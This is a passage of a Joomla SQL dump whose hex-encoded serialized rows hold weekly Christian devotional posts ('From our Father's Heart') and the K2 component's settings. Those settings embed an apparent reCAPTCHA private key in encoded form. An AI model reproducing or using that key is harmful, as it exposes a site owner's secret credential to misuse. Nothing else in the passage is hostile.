2e2031323a31302d3134292e3c2f703e0d0a3c703e4772656174206d656e206861766520677265617420617574686f7269747920627574207768656e207468657920646f6ee280997420646f207468696e6773206174207468652072696768742074696d652c2061206d6573732077696c6c20626520696e6576697461626c652e20576973646f6d2069732061637475616c6c79203830252054696d65202b20323025204465636973696f6e2e20496620796f752077696c6c20626520612077697365206d616e206f6e2074686520656172746820796f75206d7573742062652061206d616e207769746820616e20756e6465727374616e64696e67206f6620646976696e652074696d696e6720666f7220796f7572206c69666520284563632e20383a35e2809338292e205468652063697479206f66204a65727573616c656d206973207374696c6c20696e206d65737320746f646179206265636175736520736865206d6973736564206865722074696d65206f662076697369746174696f6e20284c756b652e2031393a3431e280933434292e204e6f74207265636f676e6973696e6720646976696e652074696d696e6720636f756c64206576656e7475616c6c79206c65616420746f2067656e65726174696f6e616c2070726f626c656d7320617320796f752063616e2073656520696e20746865206c696665206f6620446176696420746865204b696e672e3c2f703e0d0a3c703e436f6e71756572206c617a696e65737320616e642070726f6372617374696e6174696f6e20657665727964617920616e64206974207368616c6c2062652077656c6c207769746820796f7520696e204a65737573e28099206e616d652e20416d656e2e3c2f703e0d0a3c703e54696c6c206e657874207765656b2c20676f20616e642077696e2077697468204a657375733c2f703e0d0a3c703e476f6427732053657276616e742c3c2f703e0d0a3c703e3c7374726f6e673e526576204f6c75736f6c61204172656f67756e3c2f7374726f6e673e3c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313936223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30342d30322031313a32343a3534223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223132223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a33373a2233373a66726f6d2d6f75722d6661746865722d732d68656172742d32362d30332d32303137223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a393a224c6966656f61736973223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a35353a22636f6d706f6e656e742f6b322f6974656d2f33372d66726f6d2d6f75722d6661746865722d732d68656172742d32362d30332d32303137223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a393a224c6966656f61736973223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a393a224c6966656f61736973223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3337223b733a353a22726f757465223b733a37343a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d33373a66726f6d2d6f75722d6661746865722d732d68656172742d32362d30332d32303137223b733a353a227469746c65223b733a33363a2246726f6d206f7572204661746865722773204865617274202832362f30332f3230313729223b733a31313a226465736372697074696f6e223b733a3231303a22204944454e5449465920414e4420454c494d494e4154452054494d45205741535445525321204a6f736875612031333a312073617973202d20224e6f77204a6f7368756120776173206f6c642c20616476616e63656420696e2079656172732e20416e6420746865204c6f7264207361696420746f2068696d3a2022596f7520617265206f6c642c20616476616e63656420696e2079656172732c20616e642074686572652072656d61696e732076657279206d756368206c616e642079657420746f20626520706f737365737365642220223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30342d30322030383a34313a3035223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30342d30322030383a34313a3035223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(264, 'index.php?option=com_k2&view=item&id=39', 'index.php?option=com_k2&view=item&id=39:from-our-father-s-heart-02-04-2017', 'From our Father\'s Heart (02/04/2017)', ' Dearly Beloved, DEVELOP FAITH FOR SUPERNATURAL LIVING!!! Everyone on the earth knows how they get their needs met and the will of God for His children is that we receive our needs from Him because He is the only unfailing source (Phi. 4:19; Eph. 3:19). I want you to know that all the provisions of God for your life can only be received by faith, where you operate beyond the realm of the familiar. ', '2017-06-25 14:19:39', '3e3e225c295b88b60f3839adc66a7d02', 1, 1, 1, '*', '2017-04-02 11:25:49', '0000-00-00 00:00:00', '2017-04-02 11:25:49', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223339223b733a353a22616c696173223b733a33343a2266726f6d2d6f75722d6661746865722d732d68656172742d30322d30342d32303137223b733a373a2273756d6d617279223b733a3433303a223c703e446561726c792042656c6f7665642cc2a03c2f703e0d0a3c703e444556454c4f5020464149544820464f522053555045524e41545552414c204c4956494e47212121c2a03c2f703e0d0a3c703e45766572796f6e65206f6e20746865206561727468206b6e6f777320686f77207468657920676574207468656972206e65656473206d657420616e64207468652077696c6c206f6620476f6420666f7220486973206368696c6472656e20697320746861742077652072656365697665206f7572206e656564732066726f6d2048696d206265636175736520486520697320746865206f6e6c7920756e6661696c696e6720736f7572636520285068692e20343a31393b204570682e20333a3139292e20492077616e7420796f7520746f206b6e6f77207468617420616c6c207468652070726f766973696f6e73206f6620476f6420666f7220796f7572206c6966652063616e206f6e6c792062652072656365697665642062792066616974682c20776865726520796f75206f706572617465206265796f6e6420746865207265616c6d206f66207468652066616d696c6961722ec2a03c2f703e0d0a223b733a343a22626f6479223b733a313634393a220d0a3c703e53757065726e61747572616c204c6976696e6720697320656e676167696e672074686520617373697374616e6365206f662068656176656e20696e20796f75722065617274686c7920616374697669746965732e20536f6d652043687269737469616e732061726520737566666572696e6720746f646179206e6f74206265636175736520476f6420686173206e6f742070726f766964656420666f72207468656972206e65656473206275742062656361757365207468657920617265206e6f74206578706c6f72696e6720746865206d65616e7320476f6420686173206d61646520617661696c61626c6520746f20676574207468656972206e65656473206d65742e20497420697320776973646f6d20666f7220796f7520746f20656e6c69737420616c6c2074686520666f7263657320617420796f757220646973706f73616c20746f206765742f6f627461696e20796f7572206465736972656420726573756c742c20616e6420492077616e7420796f7520746f206c6561726e2074686520737465707320696e766f6c76656420696e206f627461696e696e6720796f7572206465736972656420726573756c742066726f6d20476f643a3c2f703e0d0a3c703e28312920476574207468652070726f6d69736520287468652073656564292066726f6d20476f64e280997320576f7264206f7220796f75722070726f70686563792028656e68616e6365642073656564292066726f6d20746865204c6f7264207468726f7567682074686520486f6c79205370697269743b3c2f703e0d0a3c703e2832292057616c6b207468652070726f636573732072657175697265643b20616e643c2f703e0d0a3c703e2833292052656365697665207468652070726f647563742ec2a03c2f703e0d0a3c703e596f75206e65656420746f20666f6c6c6f7720746865736520737465707320696e20746865207269676874206f7264657220617320686967686c6967687465642061626f76652e20546865206661696c757265206f66206d616e7920612043687269737469616e2069732064756520746f207468652076696f6c6174696f6e206f6620746865206f726465722ec2a03c2f703e0d0a3c703e3c7374726f6e673e4e6f74652074686520666f6c6c6f77696e6720706f696e74733a3c2f7374726f6e673e3c2f703e0d0a3c756c3e0d0a3c6c693e596f752063616ee2809974206765742066726f6d20476f64207468726f75676820612070726f6d697365202870726f70686563792920776861742063616e206f6e6c7920636f6d65207468726f75676820612070726f636573732e3c2f6c693e0d0a3c6c693e5468652070726f6d6973652f70726f7068656379206973207468652070726f6475637420696e207365656420666f726d2c2062757420796f752063616ee28099742077696e20776974682070726f6d6973652f70726f706865637920616c6f6e652c20796f75206861766520746f207374617274207468652070726f6365737320696e206f7264657220746f206f627461696e207468652070726f647563742028322054696d2e20313a3138292e3c2f6c693e0d0a3c6c693e5768656e20796f7520636f6d65206163726f737320612070726f6d6973652f70726f70686563792c207468652066697273742074687265652073746174656d656e747320796f75206d616b652077696c6c2064657465726d696e65207768657468657220636f6e63657074696f6e2068617070656e73206f72206e6f742c20616e6420776974686f757420636f6e63657074696f6e20796f752073686f756c64206e6f742065787065637420616e7920726573756c742e3c2f6c693e0d0a3c6c693e5768656e20776f726b696e67207468652070726f636573732c207374617920707574206265636175736520616c6c20476f64e28099732070726f6d697365732f70726f70686563696573206172652079656120616e6420616d656e20283220436f722e20313a3230292c20616e6420e2809c2e2e2e626563617573652069742077696c6c20737572656c7920636f6d652c2069742077696c6c206e6f7420746172727920284861622e20323a33292ee2809dc2a03c2f6c693e0d0a3c2f756c3e0d0a3c703e54696c6c206e657874207765656b2c20676f20616e642077696e2077697468204a65737573c2a03c2f703e0d0a3c703e476f6427732053657276616e743c2f703e0d0a3c703e5265762e204f6c75736f6c61204172656f67756e3c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313936223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30342d30392031333a34383a3538223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b